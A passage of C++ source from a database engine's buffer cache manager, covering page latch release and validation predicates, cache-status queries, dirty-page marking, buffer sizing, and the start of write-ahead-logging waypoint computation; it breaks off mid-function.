if ( pbf->bfls == bflsHashed )
{
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
for ( size_t iProc = 0; iProc < cProcs; iProc++ )
{
CSXWLatch* const psxwlProc = &Ppls( iProc )->rgBFHashedLatch[ pbf->iHashedLatch ].sxwl;
psxwlProc->ReleaseWriteLatch();
}
}
#endif // MINIMAL_FUNCTIONALITY
// if the page is going to be written it should be a used page at this point
// if a page is write-latched with bflfNoFaultFail but not dirtied then it may
// still be corrupt at this point (a dirty page shouldn't be corrupt though).
if ( pbf->bfdf > bfdfClean )
{
BFIValidatePagePgno( pbf );
BFIValidatePageUsed( pbf );
}
// save for validation
const IFMP ifmp = pbf->ifmp;
const PGNO pgno = pbf->pgno;
Assert( pgno <= g_rgfmp[ ifmp ].PgnoLast() ||
g_rgfmp[ ifmp ].FBeyondPgnoShrinkTarget( pgno ) ||
g_rgfmp[ ifmp ].FOlderDemandExtendDb() );
BFIDehydratePage( pbf, fTrue );
// if this IFMP / PGNO is clean, simply release the write latch
if ( pbf->bfdf == bfdfClean )
{
pbf->sxwl.ReleaseWriteLatch();
}
else
{
// else release our write latch (with maintenance)
BFIUnlatchMaintPage( pbf, bfltWrite );
}
// validate OUT args
Assert( FBFNotLatched( ifmp, pgno ) );
}
void BFWARUnlatch( BFLatch* pbfl )
{
// validate IN args
Assert( FBFWARLatched( pbfl ) );
// mark this BF as not WAR Latched
PBF( pbfl->dwContext )->fWARLatch = fFalse;
// release our exclusive latch
BFRDWUnlatch( pbfl );
}
void BFRDWUnlatch( BFLatch* pbfl )
{
// validate IN args
Assert( FBFRDWLatched( pbfl ) );
// if this IFMP / PGNO is clean, simply release the rdw latch
const PBF pbf = PBF( pbfl->dwContext );
// should always be a used page at this point
BFIValidatePageUsed( pbf );
// save for validation
const IFMP ifmp = pbf->ifmp;
const PGNO pgno = pbf->pgno;
if ( pbf->bfdf == bfdfClean )
{
pbf->sxwl.ReleaseExclusiveLatch();
}
else
{
// release our exclusive latch (with maintenance)
BFIUnlatchMaintPage( pbf, bfltExclusive );
}
// validate OUT args
Assert( FBFNotLatched( ifmp, pgno ) );
}
void BFReadUnlatch( BFLatch* pbfl )
{
// validate IN args
Assert( FBFReadLatched( pbfl ) );
// extract our BF and latch from the latch context
PBF pbf;
CSXWLatch* psxwl;
if ( pbfl->dwContext & 1 )
{
pbf = ((BFHashedLatch*)( pbfl->dwContext ^ 1 ))->pbf;
psxwl = &((BFHashedLatch*)( pbfl->dwContext ^ 1 ))->sxwl;
}
else
{
pbf = PBF( pbfl->dwContext );
psxwl = &pbf->sxwl;
}
// save for validation
const IFMP ifmp = pbf->ifmp;
const PGNO pgno = pbf->pgno;
if ( pbf->bfdf != bfdfFilthy )
{
// if this IFMP / PGNO is not filthy, simply release the read latch
psxwl->ReleaseSharedLatch();
}
else
{
// release our shared latch (with maintenance)
BFIUnlatchMaintPage( pbf, bfltShared );
}
// validate OUT args
Assert( FBFNotLatched( ifmp, pgno ) );
}
void BFMarkAsSuperCold( IFMP ifmp, PGNO pgno, const BFLatchFlags bflf )
{
// this function makes a non-blocking attempt to push the page to the
// end (oldest) of the LRUK. We need at least an X latch.
// Don't care about tracing context because the page wouldn't be read from disk
// UNDONE: we don't currently use this in any code path where we care to trace this but we could in the future
TraceContextScope tcScope;
tcScope->nParentObjectClass = tceNone;
BFLatch bfl;
ERR err = ErrBFRDWLatchPage(
&bfl,
ifmp,
pgno,
BFLatchFlags( bflfNoTouch | bflfNoFaultFail | bflfUninitPageOk | bflfNoWait | bflfNoEventLogging | bflfNoUncached | bflf ),
BfpriBFMake( g_pctCachePriorityNeutral, (BFTEMPOSFILEQOS)0 /* should not matter - NoUncached */ ),
*tcScope );
if ( err >= JET_errSuccess )
{
const ERR errBFLatchStatus = ErrBFLatchStatus( &bfl );
if( ( errBFLatchStatus >= JET_errSuccess ) || ( errBFLatchStatus == JET_errPageNotInitialized ) )
{
// if the error is patchable, we don't want to super-cold the page because
// there may be a patch request under way.
Expected( !PagePatching::FIsPatchableError( errBFLatchStatus ) );
BFMarkAsSuperCold( &bfl );
}
BFRDWUnlatch( &bfl );
}
}
void BFMarkAsSuperCold( BFLatch *pbfl )
{
Assert( FBFRDWLatched( pbfl ) || FBFWriteLatched( pbfl ) );
// extract our BF and latch from the latch context
const PBF pbf = PbfBFILatchContext( pbfl->dwContext );
BFIMarkAsSuperCold( pbf, fTrue );
}
void BFCacheStatus( const IFMP ifmp, const PGNO pgno, BOOL* const pfInCache, ERR* const perrBF, BFDirtyFlags* const pbfdf )
{
*pfInCache = fFalse;
( perrBF != NULL ) ? ( *perrBF = JET_errSuccess ) : 0;
( pbfdf != NULL ) ? ( *pbfdf = bfdfMin ) : 0;
if ( g_fBFCacheInitialized )
{
PGNOPBF pgnopbf;
BFHash::ERR errHash;
BFHash::CLock lock;
// look up this IFMP / PGNO in the hash table
g_bfhash.ReadLockKey( IFMPPGNO( ifmp, pgno ), &lock );
errHash = g_bfhash.ErrRetrieveEntry( &lock, &pgnopbf );
if ( errHash == BFHash::ERR::errSuccess )
{
*pfInCache = fTrue;
( perrBF != NULL ) ? ( *perrBF = pgnopbf.pbf->err ) : 0;
( pbfdf != NULL ) ? ( *pbfdf = (BFDirtyFlags)pgnopbf.pbf->bfdf ) : 0;
}
g_bfhash.ReadUnlockKey( &lock );
}
}
BOOL FBFInCache( IFMP ifmp, PGNO pgno )
{
BOOL fInCache = fFalse;
BFCacheStatus( ifmp, pgno, &fInCache );
return fInCache;
}
// determines if a given page was previously in the cache ... this allows
// someone to know if a page was recently pulled into the cache. this is designed
// to be called after a BFPreread API but before acquiring the latch. if you
// acquire the latch, it will start returning true (even if your pre-read caused
// the page to be cached).
BOOL FBFPreviouslyCached( IFMP ifmp, PGNO pgno )
{
BOOL fInCache = fFalse;
ERR errBF = JET_errSuccess;
BFCacheStatus( ifmp, pgno, &fInCache, &errBF );
return ( fInCache && // must have been in cache already
( errBF != errBFIPageFaultPending ) && // and page NOT currently being read in
( errBF != errBFIPageNotVerified ) ); // and page NOT been used (i.e. no one has latched since read)
}
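// Illustrative sketch (not part of the engine): using FBFPreviouslyCached() to
// tell whether a just-issued preread actually faulted the page in from disk.
// The example function is hypothetical and the preread call itself is elided.
#if 0
void ExampleCheckPrereadEffect( const IFMP ifmp, const PGNO pgno )
{
// sample after issuing the preread but before latching the page, because
// latching marks the page as used / verified and the answer flips to true
const BOOL fWasAlreadyCached = FBFPreviouslyCached( ifmp, pgno );
if ( !fWasAlreadyCached )
{
// the page was (or is currently being) faulted in by our preread
}
}
#endif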
#ifdef DEBUG
BOOL FBFReadLatched( const BFLatch* pbfl )
{
return FBFICacheValidPv( pbfl->pv ) &&
FBFILatchValidContext( pbfl->dwContext ) &&
pbfl->pv == PbfBFILatchContext( pbfl->dwContext )->pv &&
PsxwlBFILatchContext( pbfl->dwContext )->FOwnSharedLatch() &&
FBFCurrentLatch( pbfl );
}
BOOL FBFNotReadLatched( const BFLatch* pbfl )
{
return !FBFICacheValidPv( pbfl->pv ) ||
!FBFILatchValidContext( pbfl->dwContext ) ||
pbfl->pv != PbfBFILatchContext( pbfl->dwContext )->pv ||
PsxwlBFILatchContext( pbfl->dwContext )->FNotOwnSharedLatch();
}
BOOL FBFReadLatched( IFMP ifmp, PGNO pgno )
{
PGNOPBF pgnopbf;
BFHash::ERR errHash;
BFHash::CLock lock;
BOOL fReadLatched;
// look up this IFMP / PGNO in the hash table
g_bfhash.ReadLockKey( IFMPPGNO( ifmp, pgno ), &lock );
errHash = g_bfhash.ErrRetrieveEntry( &lock, &pgnopbf );
// this IFMP / PGNO is Read Latched if it is present in the hash table and
// the associated BF or one of its hashed latches is share latched by us
fReadLatched = errHash == BFHash::ERR::errSuccess;
if ( fReadLatched )
{
fReadLatched = ( pgnopbf.pbf->sxwl.FOwnSharedLatch() &&
FBFICurrentPage( pgnopbf.pbf, ifmp, pgno ) );
const size_t iHashedLatch = pgnopbf.pbf->iHashedLatch;
if ( iHashedLatch < cBFHashedLatch )
{
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
for ( size_t iProc = 0; iProc < cProcs; iProc++ )
{
BFHashedLatch* const pbfhl = &Ppls( iProc )->rgBFHashedLatch[ iHashedLatch ];
fReadLatched = fReadLatched ||
( pbfhl->sxwl.FOwnSharedLatch() &&
pbfhl->pbf == pgnopbf.pbf &&
FBFICurrentPage( pgnopbf.pbf, ifmp, pgno ) );
}
}
}
// release our lock on the hash table
g_bfhash.ReadUnlockKey( &lock );
// return the result of the test
return fReadLatched;
}
BOOL FBFNotReadLatched( IFMP ifmp, PGNO pgno )
{
PGNOPBF pgnopbf;
BFHash::ERR errHash;
BFHash::CLock lock;
BOOL fNotReadLatched;
// look up this IFMP / PGNO in the hash table
g_bfhash.ReadLockKey( IFMPPGNO( ifmp, pgno ), &lock );
errHash = g_bfhash.ErrRetrieveEntry( &lock, &pgnopbf );
// this IFMP / PGNO is not Read Latched if it is not present in the hash
// table or if neither the associated BF nor any of its hashed latches is
// share latched by us
fNotReadLatched = errHash == BFHash::ERR::errEntryNotFound;
if ( !fNotReadLatched )
{
fNotReadLatched = pgnopbf.pbf->sxwl.FNotOwnSharedLatch();
const size_t iHashedLatch = pgnopbf.pbf->iHashedLatch;
if ( iHashedLatch < cBFHashedLatch )
{
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
for ( size_t iProc = 0; iProc < cProcs; iProc++ )
{
BFHashedLatch* const pbfhl = &Ppls( iProc )->rgBFHashedLatch[ iHashedLatch ];
fNotReadLatched = fNotReadLatched && ( pbfhl->sxwl.FNotOwnSharedLatch() || pbfhl->pbf != pgnopbf.pbf );
}
}
}
// release our lock on the hash table
g_bfhash.ReadUnlockKey( &lock );
// return the result of the test
return fNotReadLatched;
}
BOOL FBFRDWLatched( const BFLatch* pbfl )
{
return FBFICacheValidPv( pbfl->pv ) &&
FBFILatchValidContext( pbfl->dwContext ) &&
FBFICacheValidPbf( PBF( pbfl->dwContext ) ) &&
pbfl->pv == PBF( pbfl->dwContext )->pv &&
!PBF( pbfl->dwContext )->fWARLatch &&
PBF( pbfl->dwContext )->sxwl.FOwnExclusiveLatch() &&
FBFCurrentLatch( pbfl ) &&
FBFUpdatableLatch( pbfl );
}
BOOL FBFNotRDWLatched( const BFLatch* pbfl )
{
return !FBFICacheValidPv( pbfl->pv ) ||
!FBFILatchValidContext( pbfl->dwContext ) ||
!FBFICacheValidPbf( PBF( pbfl->dwContext ) ) ||
pbfl->pv != PBF( pbfl->dwContext )->pv ||
PBF( pbfl->dwContext )->fWARLatch ||
PBF( pbfl->dwContext )->sxwl.FNotOwnExclusiveLatch();
}
BOOL FBFRDWLatched( IFMP ifmp, PGNO pgno )
{
PGNOPBF pgnopbf;
BFHash::ERR errHash;
BFHash::CLock lock;
BOOL fRDWLatched;
// look up this IFMP / PGNO in the hash table
g_bfhash.ReadLockKey( IFMPPGNO( ifmp, pgno ), &lock );
errHash = g_bfhash.ErrRetrieveEntry( &lock, &pgnopbf );
// this IFMP / PGNO is RDW Latched if it is present in the hash table and
// the associated BF is not marked as WAR Latched and the associated BF is
// exclusively latched by us
fRDWLatched = errHash == BFHash::ERR::errSuccess &&
!pgnopbf.pbf->fWARLatch &&
pgnopbf.pbf->sxwl.FOwnExclusiveLatch() &&
FBFICurrentPage( pgnopbf.pbf, ifmp, pgno ) &&
FBFIUpdatablePage( pgnopbf.pbf );
// release our lock on the hash table
g_bfhash.ReadUnlockKey( &lock );
// return the result of the test
return fRDWLatched;
}
BOOL FBFNotRDWLatched( IFMP ifmp, PGNO pgno )
{
PGNOPBF pgnopbf;
BFHash::ERR errHash;
BFHash::CLock lock;
BOOL fNotRDWLatched;
// look up this IFMP / PGNO in the hash table
g_bfhash.ReadLockKey( IFMPPGNO( ifmp, pgno ), &lock );
errHash = g_bfhash.ErrRetrieveEntry( &lock, &pgnopbf );
// this IFMP / PGNO is not RDW Latched if it is not present in the hash
// table or the associated BF is marked as WAR Latched or the associated
// BF is not exclusively latched by us
fNotRDWLatched = errHash == BFHash::ERR::errEntryNotFound ||
pgnopbf.pbf->fWARLatch ||
pgnopbf.pbf->sxwl.FNotOwnExclusiveLatch();
// release our lock on the hash table
g_bfhash.ReadUnlockKey( &lock );
// return the result of the test
return fNotRDWLatched;
}
BOOL FBFWARLatched( const BFLatch* pbfl )
{
return FBFICacheValidPv( pbfl->pv ) &&
FBFILatchValidContext( pbfl->dwContext ) &&
FBFICacheValidPbf( PBF( pbfl->dwContext ) ) &&
pbfl->pv == PBF( pbfl->dwContext )->pv &&
PBF( pbfl->dwContext )->fWARLatch &&
PBF( pbfl->dwContext )->sxwl.FOwnExclusiveLatch() &&
FBFCurrentLatch( pbfl ) &&
FBFUpdatableLatch( pbfl );
}
BOOL FBFNotWARLatched( const BFLatch* pbfl )
{
return !FBFICacheValidPv( pbfl->pv ) ||
!FBFILatchValidContext( pbfl->dwContext ) ||
!FBFICacheValidPbf( PBF( pbfl->dwContext ) ) ||
pbfl->pv != PBF( pbfl->dwContext )->pv ||
!PBF( pbfl->dwContext )->fWARLatch ||
PBF( pbfl->dwContext )->sxwl.FNotOwnExclusiveLatch();
}
BOOL FBFWARLatched( IFMP ifmp, PGNO pgno )
{
PGNOPBF pgnopbf;
BFHash::ERR errHash;
BFHash::CLock lock;
BOOL fWARLatched;
// look up this IFMP / PGNO in the hash table
g_bfhash.ReadLockKey( IFMPPGNO( ifmp, pgno ), &lock );
errHash = g_bfhash.ErrRetrieveEntry( &lock, &pgnopbf );
// this IFMP / PGNO is WAR Latched if it is present in the hash table and
// the associated BF is marked as WAR Latched and the associated BF is
// exclusively latched by us
fWARLatched = errHash == BFHash::ERR::errSuccess &&
pgnopbf.pbf->fWARLatch &&
pgnopbf.pbf->sxwl.FOwnExclusiveLatch() &&
FBFICurrentPage( pgnopbf.pbf, ifmp, pgno ) &&
FBFIUpdatablePage( pgnopbf.pbf );
// release our lock on the hash table
g_bfhash.ReadUnlockKey( &lock );
// return the result of the test
return fWARLatched;
}
BOOL FBFNotWARLatched( IFMP ifmp, PGNO pgno )
{
PGNOPBF pgnopbf;
BFHash::ERR errHash;
BFHash::CLock lock;
BOOL fNotWARLatched;
// look up this IFMP / PGNO in the hash table
g_bfhash.ReadLockKey( IFMPPGNO( ifmp, pgno ), &lock );
errHash = g_bfhash.ErrRetrieveEntry( &lock, &pgnopbf );
// this IFMP / PGNO is not WAR Latched if it is not present in the hash
// table or the associated BF is not marked as WAR Latched or the associated
// BF is not exclusively latched by us
fNotWARLatched = errHash == BFHash::ERR::errEntryNotFound ||
!pgnopbf.pbf->fWARLatch ||
pgnopbf.pbf->sxwl.FNotOwnExclusiveLatch();
// release our lock on the hash table
g_bfhash.ReadUnlockKey( &lock );
// return the result of the test
return fNotWARLatched;
}
BOOL FBFWriteLatched( const BFLatch* pbfl )
{
BOOL fWriteLatched;
fWriteLatched = FBFICacheValidPv( pbfl->pv ) &&
FBFILatchValidContext( pbfl->dwContext ) &&
FBFICacheValidPbf( PBF( pbfl->dwContext ) ) &&
pbfl->pv == PBF( pbfl->dwContext )->pv &&
PBF( pbfl->dwContext )->sxwl.FOwnWriteLatch() &&
FBFCurrentLatch( pbfl ) &&
FBFUpdatableLatch( pbfl );
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
if ( fWriteLatched && PBF( pbfl->dwContext )->bfls == bflsHashed )
{
const size_t iHashedLatch = PBF( pbfl->dwContext )->iHashedLatch;
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
for ( size_t iProc = 0; iProc < cProcs; iProc++ )
{
BFHashedLatch* const pbfhl = &Ppls( iProc )->rgBFHashedLatch[ iHashedLatch ];
fWriteLatched = fWriteLatched && pbfhl->sxwl.FOwnWriteLatch();
}
}
#endif // MINIMAL_FUNCTIONALITY
return fWriteLatched;
}
BOOL FBFNotWriteLatched( const BFLatch* pbfl )
{
BOOL fNotWriteLatched;
fNotWriteLatched = !FBFICacheValidPv( pbfl->pv ) ||
!FBFILatchValidContext( pbfl->dwContext ) ||
!FBFICacheValidPbf( PBF( pbfl->dwContext ) ) ||
pbfl->pv != PBF( pbfl->dwContext )->pv ||
PBF( pbfl->dwContext )->sxwl.FNotOwnWriteLatch();
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
if ( !fNotWriteLatched && PBF( pbfl->dwContext )->bfls == bflsHashed )
{
const size_t iHashedLatch = PBF( pbfl->dwContext )->iHashedLatch;
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
for ( size_t iProc = 0; iProc < cProcs; iProc++ )
{
BFHashedLatch* const pbfhl = &Ppls( iProc )->rgBFHashedLatch[ iHashedLatch ];
fNotWriteLatched = fNotWriteLatched || pbfhl->sxwl.FNotOwnWriteLatch();
}
}
#endif // MINIMAL_FUNCTIONALITY
return fNotWriteLatched;
}
BOOL FBFWriteLatched( IFMP ifmp, PGNO pgno )
{
PGNOPBF pgnopbf;
BFHash::ERR errHash;
BFHash::CLock lock;
BOOL fWriteLatched;
// look up this IFMP / PGNO in the hash table
g_bfhash.ReadLockKey( IFMPPGNO( ifmp, pgno ), &lock );
errHash = g_bfhash.ErrRetrieveEntry( &lock, &pgnopbf );
// this IFMP / PGNO is Write Latched if it is present in the hash table and
// the associated BF and all its hashed latches are write latched by us
fWriteLatched = errHash == BFHash::ERR::errSuccess &&
pgnopbf.pbf->sxwl.FOwnWriteLatch() &&
FBFICurrentPage( pgnopbf.pbf, ifmp, pgno ) &&
FBFIUpdatablePage( pgnopbf.pbf );
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
if ( fWriteLatched && pgnopbf.pbf->bfls == bflsHashed )
{
const size_t iHashedLatch = pgnopbf.pbf->iHashedLatch;
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
for ( size_t iProc = 0; iProc < cProcs; iProc++ )
{
BFHashedLatch* const pbfhl = &Ppls( iProc )->rgBFHashedLatch[ iHashedLatch ];
fWriteLatched = fWriteLatched && pbfhl->sxwl.FOwnWriteLatch();
}
}
#endif // MINIMAL_FUNCTIONALITY
// release our lock on the hash table
g_bfhash.ReadUnlockKey( &lock );
// return the result of the test
return fWriteLatched;
}
BOOL FBFNotWriteLatched( IFMP ifmp, PGNO pgno )
{
PGNOPBF pgnopbf;
BFHash::ERR errHash;
BFHash::CLock lock;
BOOL fNotWriteLatched;
// look up this IFMP / PGNO in the hash table
g_bfhash.ReadLockKey( IFMPPGNO( ifmp, pgno ), &lock );
errHash = g_bfhash.ErrRetrieveEntry( &lock, &pgnopbf );
// this IFMP / PGNO is not Write Latched if it is not present in the hash
// table or if the associated BF or any of its hashed latches is not write
// latched by us
fNotWriteLatched = errHash == BFHash::ERR::errEntryNotFound ||
pgnopbf.pbf->sxwl.FNotOwnWriteLatch();
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
if ( !fNotWriteLatched && pgnopbf.pbf->bfls == bflsHashed )
{
const size_t iHashedLatch = pgnopbf.pbf->iHashedLatch;
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
for ( size_t iProc = 0; iProc < cProcs; iProc++ )
{
BFHashedLatch* const pbfhl = &Ppls( iProc )->rgBFHashedLatch[ iHashedLatch ];
fNotWriteLatched = fNotWriteLatched || pbfhl->sxwl.FNotOwnWriteLatch();
}
}
#endif // MINIMAL_FUNCTIONALITY
// release our lock on the hash table
g_bfhash.ReadUnlockKey( &lock );
// return the result of the test
return fNotWriteLatched;
}
BOOL FBFLatched( const BFLatch* pbfl )
{
return FBFReadLatched( pbfl ) ||
FBFRDWLatched( pbfl ) ||
FBFWARLatched( pbfl ) ||
FBFWriteLatched( pbfl );
}
BOOL FBFNotLatched( const BFLatch* pbfl )
{
return FBFNotReadLatched( pbfl ) &&
FBFNotRDWLatched( pbfl ) &&
FBFNotWARLatched( pbfl ) &&
FBFNotWriteLatched( pbfl );
}
BOOL FBFLatched( IFMP ifmp, PGNO pgno )
{
return FBFReadLatched( ifmp, pgno ) ||
FBFRDWLatched( ifmp, pgno ) ||
FBFWARLatched( ifmp, pgno ) ||
FBFWriteLatched( ifmp, pgno );
}
BOOL FBFNotLatched( IFMP ifmp, PGNO pgno )
{
return FBFNotReadLatched( ifmp, pgno ) &&
FBFNotRDWLatched( ifmp, pgno ) &&
FBFNotWARLatched( ifmp, pgno ) &&
FBFNotWriteLatched( ifmp, pgno );
}
// Checks that the BFLatch holds the most current version of the page
// Note: This overload performs the most thorough check.
BOOL FBFCurrentLatch( const BFLatch* pbfl, IFMP ifmp, PGNO pgno )
{
return FBFICurrentPage( PbfBFILatchContext( pbfl->dwContext ), ifmp, pgno );
}
BOOL FBFCurrentLatch( const BFLatch* pbfl )
{
const PBF pbf = PbfBFILatchContext( pbfl->dwContext );
return FBFCurrentLatch( pbfl, pbf->ifmp, pbf->pgno );
}
// Checks that the BFLatch holds an updatable version of the page
BOOL FBFUpdatableLatch( const BFLatch* pbfl )
{
// would not make sense to call this external latch function on a non-current page
Assert( FBFCurrentLatch( pbfl ) );
return FBFIUpdatablePage( PbfBFILatchContext( pbfl->dwContext ) );
}
#endif // DEBUG
DWORD_PTR BFGetLatchHint( const BFLatch* pbfl )
{
// validate IN args
Assert( FBFLatched( pbfl ) );
// return a pointer to the latched BF as the stable latch hint
return (DWORD_PTR)PbfBFILatchContext( pbfl->dwContext );
}
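// Illustrative sketch (not part of the engine): capturing the stable latch hint
// while a page is latched so that a later latch attempt can use the bflfHint
// fast path (see ErrBFRDWLatchPage() above). The structure holding the hint is
// hypothetical; callers typically stash it alongside their cached pgno.
#if 0
struct ExamplePageRef
{
PGNO pgno;
DWORD_PTR dwLatchHint;
};
void ExampleRememberHint( const BFLatch* const pbfl, ExamplePageRef* const pref )
{
// legal only while the page is latched
pref->dwLatchHint = BFGetLatchHint( pbfl );
}
#endif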
////////////////
// Page State
// These functions are used to control and query the state of a page (or
// pages) in the buffer cache.
// Retrieves the ERR state from the latch (which is presumably set there
// by an IO operation or page validation).
ERR ErrBFLatchStatus( const BFLatch * pbfl )
{
Assert( FBFRDWLatched( pbfl ) || FBFWARLatched( pbfl ) || FBFWriteLatched( pbfl ) );
Expected( FBFRDWLatched( pbfl ) || FBFWriteLatched( pbfl ) );
Expected( PBF( pbfl->dwContext )->err != JET_errOutOfMemory &&
PBF( pbfl->dwContext )->err != JET_errOutOfBuffers );
return PBF( pbfl->dwContext )->err;
}
// Clears the error state of the buffer and rehydrates it to full size in preparation
// for the page to be used / new'd.
void BFInitialize( BFLatch* pbfl, const TraceContext& tc )
{
Assert( FBFWriteLatched( pbfl ) );
const PBF pbf = PbfBFILatchContext( pbfl->dwContext );
BFIInitialize( pbf, tc );
}
// Marks the given WAR Latched or Write Latched page as dirty. This means
// that the given buffer for this page contains changes that should be written
// to disk. The degree of dirtiness is specified by the given dirty flags.
// A page can only be made more dirty. Trying to make a page less dirty than
// it currently is will have no effect.
void BFDirty( const BFLatch* pbfl, BFDirtyFlags bfdf, const TraceContext& tc )
{
// validate IN args
Assert( FBFWARLatched( pbfl ) || FBFWriteLatched( pbfl ) );
Assert( FBFUpdatableLatch( pbfl ) );
if ( bfdf >= bfdfDirty )
{
// Reason for this restriction is documented in BFSetLgposModify() under
// the "WAR Latches and Logged Operations" comment. Also if you look in
// BFIDirtyPage() you will find code for resetting the OB0 that wouldn't
// work properly if we set the OB0 lgpos with a WAR latch.
Assert( FBFWriteLatched( pbfl ) );
Assert( FBFNotWARLatched( pbfl ) );
}
const PBF pbf = PBF( pbfl->dwContext );
// This page has been updated and is going to be written to disk. This invalidates
// all outstanding patch requests
if ( BoolParam( PinstFromIfmp( pbf->ifmp ), JET_paramEnableExternalAutoHealing ) )
{
Assert( FBFWARLatched( pbf->ifmp, pbf->pgno ) || FBFWriteLatched( pbf->ifmp, pbf->pgno ) );
PagePatching::CancelPatchRequest( pbf->ifmp, pbf->pgno );
}
// dirty the BF
BFIDirtyPage( pbf, bfdf, tc );
}
// Returns the current dirtiness of the given latched page.
BFDirtyFlags FBFDirty( const BFLatch* pbfl )
{
// validate IN args
Assert( FBFLatched( pbfl ) );
// get the dirty flag for the page
return BFDirtyFlags( PBF( pbfl->dwContext )->bfdf );
}
// Returns the native buffer size the buffer manager can support given the
// requested size.
LONG CbBFGetBufferSize( const LONG cbReqSize )
{
ICBPage icbNewSize = max( icbPage4KB, IcbBFIBufferSize( cbReqSize ) );
Assert( CbBFISize( icbNewSize ) >= cbReqSize );
return CbBFISize( icbNewSize );
}
// Returns the current buffer size backing the given latched page.
// NOTE: buffer size may be dehydrated and thus different than CbBFPageSize().
LONG CbBFBufferSize( const BFLatch* pbfl )
{
// validate IN args
// get the buffer size of this particular buffer
return CbBFIBufferSize( PBF( pbfl->dwContext ) );
}
// Returns the page size of the given latched page.
LONG CbBFPageSize( const BFLatch* pbfl )
{
// validate IN args
// get the page size of this particular buffer
return CbBFIPageSize( PBF( pbfl->dwContext ) );
}
// Changes the size of the buffer underlying the provided latch.
// It is expected the user has the w-latch.
// if shrinking ( cbNewSize < CbBFBufferSize() ), make sure all data you want is
// removed from the tail end of the buffer.
// if growing ( cbNewSize > CbBFBufferSize() ), the new buffer will be allocated /
// extended and referenceable at the end of the call.
void BFSetBufferSize( __inout BFLatch* pbfl, __in const INT cbNewSize )
{
Assert( FBFWriteLatched( pbfl ) );
Assert( CbBFISize( IcbBFIBufferSize( cbNewSize ) ) == cbNewSize );
CallS( ErrBFISetBufferSize( (PBF)pbfl->dwContext, IcbBFIBufferSize( cbNewSize ), fTrue ) );
}
////////////////////////
// Logging / Recovery
// The following functions are provided for logging / recovery support.
//
// (diagram assumes fixed width)
//
// dbhdr.le_lGenMinRequired dbhdr.le_lGenMaxRequired dbhdr.le_lGenCommitted[1] or "log tip"
// and checkpoint (edb.jcp) aka waypoint (normally) plog->LgposLGLogTipNoLock()
// | | |
// | | | unflushed log buffers
// | updated & possibly* | | |
// updated & flushed | flushed | updated & unflushed | | | future log writes ->
// -------------------------|-------------------------|------------------------|ooo| - - - - - - - - - - - -
//
// ---|---------------|---------------|---------------|---------------|---------xxxxxx|
// | edb0002E.jtx | edb0002F.jtx | edb00030.jtx | edb00031.jtx | edb.jtx |
//
// --- - log records (page references) committed / flushed to the disk / transaction log.
// ooo - log records (page references) not yet flushed / committed to disk.
// xxx - pattern filled log
//
// * by possibly we mean, some pages are flushed to disk from the buffer manager and
// some are unflushed.
//
// Note: Win2k3 / e2k3 and before did not have the waypoint, and the le_lGenMaxRequired
// was effectively the same as the log tip.
// The modify log position for each buffer is used to prevent a dirty
// buffer from being flushed to disk before the changes in it can be logged
// (under the Write Ahead Logging paradigm) or to prevent flushing of
// changes that are inhibited due to waypoint latency policy.
// The Begin 0 log position for each buffer indicates the oldest transaction
// that has made a modification to that buffer. This is used in computing
// the Oldest Begin 0 log position, which indicates the oldest transaction
// that still has unsaved changes in the buffer cache. This log position is
// used to compute the current checkpoint depth.
// NOTE: The waypoint is a per FMP / database concept whereas the checkpoint
// and log gen committed are maintained across all databases attached to a
// given log.
//
void BFGetBestPossibleWaypoint(
__in IFMP ifmp,
__in const LONG lgenCommitted,
__out LGPOS * plgposBestWaypoint )
{
FMP* pfmp = &g_rgfmp[ ifmp ];
LOG * plog = PinstFromIfmp( ifmp )->m_plog;
LGPOS lgposCurrentWaypoint;
Assert( plgposBestWaypoint );
Assert( plog && pfmp );
// we read current, then best possible waypoint / log tip, in this order.
// This is critical for BFIMaintWaypointRequest() to work.
// Grab the current waypoint.
lgposCurrentWaypoint = pfmp->LgposWaypoint();
// Make sure we do the right thing for non-logged databases ...
if ( plog->FLogDisabled() || !pfmp->FLogOn() )
{
Assert( CmpLgpos( lgposCurrentWaypoint, lgposMin ) == 0 );
*plgposBestWaypoint = lgposMin;
return;
}
// Grab the tip of the flushed log
LGPOS lgposPreferredWaypoint;
if ( plog->FRecovering() && fRecoveringRedo == plog->FRecoveringMode() )
{
// on recovery-redo, must obtain the generation from
// m_lgposRedo, because in some error cases, m_plgfilehdr
// actually points to edb.log, which may not be the last log
// we played up to; for instance, if we've replayed up to
// generation 20, but generation 21 is missing, we'll open
// edb.log, and if it's not actually generation 21, we will
// eventually properly err out, but m_plgfilehdr will be left
// pointing at edb.log and the last checkpoint update before
// erring out will end up erroneously using it here; or as
// another example, if a newly-opened logfile (not necessarily
// edb.log) is determined to be corrupt, then m_plgfilehdr will
// be pointing to it, but m_lgposRedo will still be pointing to
// the previous logfile
//
lgposPreferredWaypoint.lGeneration = plog->LgposLGLogTipNoLock().lGeneration;
}
else if ( 0 != lgenCommitted )
{
// lgenCommitted should either point to the current log file,
// or it should point to the next log file (which we're in the
// midst of switching to)
//
// because we update db headers before copying
// m_plgfilehdrT to m_plgfilehdr, there is a chance that
// we end up calling this function with an lgenCommitted
// (which is obtained using m_plgfilehdr) that is stale by
// one generation, but fortunately, the MaxLgpos()
// calculation at the end of this function saves us
//
Assert( lgenCommitted == plog->LGGetCurrentFileGenNoLock()
|| lgenCommitted == plog->LGGetCurrentFileGenNoLock() + 1
|| lgenCommitted == plog->LGGetCurrentFileGenNoLock() - 1 );
lgposPreferredWaypoint.lGeneration = lgenCommitted;
}
else
{
lgposPreferredWaypoint.lGeneration = plog->LGGetCurrentFileGenWithLock();
}
// Set the isec/ib to the end, b/c we only support whole log jumps currently.
lgposPreferredWaypoint.isec = lgposMax.isec;
lgposPreferredWaypoint.ib = lgposMax.ib;
// calculate the best possible waypoint ...
if ( pfmp->FNoWaypointLatency() ||
PinstFromIfmp( ifmp )->m_fNoWaypointLatency )
{
//
